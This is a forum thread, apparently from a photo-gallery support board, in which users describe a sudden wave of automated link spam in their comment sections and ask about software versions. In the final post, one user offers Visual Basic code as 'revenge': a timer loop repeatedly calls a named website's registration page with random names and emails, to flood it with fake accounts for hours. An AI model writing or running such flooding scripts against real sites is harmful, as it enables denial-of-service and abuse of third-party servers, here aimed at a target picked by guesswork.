I apologize if this has been addressed already but just this week for the first time ever in my gallery, I am starting to get some kind of bug where something is continuously spamming my comments section with advertisement links....I've had my gallery up since 2004 and never had this problem before, now suddenly its happening.....whatever is doing this posts the same links spanning over 20 threads in a row. Yesterday I blocked the IP address from these and deleted them and today another one started.

People like to post comments so I'd hate to have to shut that option off and relegate it to only members but this is getting out of hand now and I am not sure doing that would work, the following is an example of what I am talking about:

that's weird. I got the same spam on my coppermine boards too within the past 12 hours.  I think I deleted around 200 spam posts with that freakin' mosquito link too.

May I ask what version you're using ?  Just want to know if it's a problem with newer versions/releases too.
I'm running a 1.3.x version (yeah, I know, I really need to upgrade. I think now is the perfect time).

Thanks!

I did get spam by that idiot too. here's my revenge. I did some research and that dude owns doormoney.com. So here's some Visual Basic code.

Add a Timer (Set the timer for like 900 ms or so.) and a component named "Microsoft Internet Controls".

Private Sub Timer1_Timer()

Randomize
nummer = Int(10000000 * Rnd + 1)

web.Navigate "http://www.doormoney.com/register.php?name=s" & nummer & "&pass=aabbccddee&pass2=aabbccddee&email=" & nummer & "@" & nummer & ".com" & "&icq=" & nummer & "&agreed=on"

End Sub

Run the program and it will start to signup for new accounts for the spammers program. Let it run for a couple of hours and I'm sure he'll get a nice suprise in the morning. =)
